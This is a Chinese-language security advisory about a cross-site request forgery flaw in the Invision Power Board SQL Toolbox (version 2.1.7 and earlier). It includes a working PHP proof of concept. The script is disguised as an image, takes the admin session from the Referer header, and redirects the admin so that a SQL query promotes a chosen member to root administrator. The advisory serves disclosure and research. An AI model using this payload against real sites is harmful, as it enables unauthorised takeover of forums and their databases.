发布日期：2006-10-04
更新日期：2006-10-09

受影响系统：

Invision PS IPB <= 2.1.7

描述：

---

CVE(CAN) ID: CVE-2006-2059,CVE-2006-2060,CVE-2006-2061

Invision Power Board是一个非常流行的PHP论坛程序。

IPB的Toolbox在处理请求时存在漏洞，远程攻击者可能利用此漏洞非授权访问数据库。

如果管理员能够访问Invision Power Board的SQL Toolbox，且在浏览器中浏览了恶意图形，就可能被重新定向通过SQL Toolbox强制执行SQL命令。这种攻击很难被发现，因为仅有图形而不是页面被重新定向。

<*来源：Rapigator （rapigator@yahoo.com）
  
  链接：http://secunia.com/advisories/19830/print/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php

//The member id to promote to root admin
$mid = 145;

//The database prefix (usually "ibf_")
$prefix = "ibf_";

if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
    header("Location:
".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+whe \
re+id%3D{$mid}+LIMIT+1"); }

?>

建议：

---

厂商补丁：

Invision PS
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.invisionpower.com/

浏览次数：2627
严重程度：0（网友投票）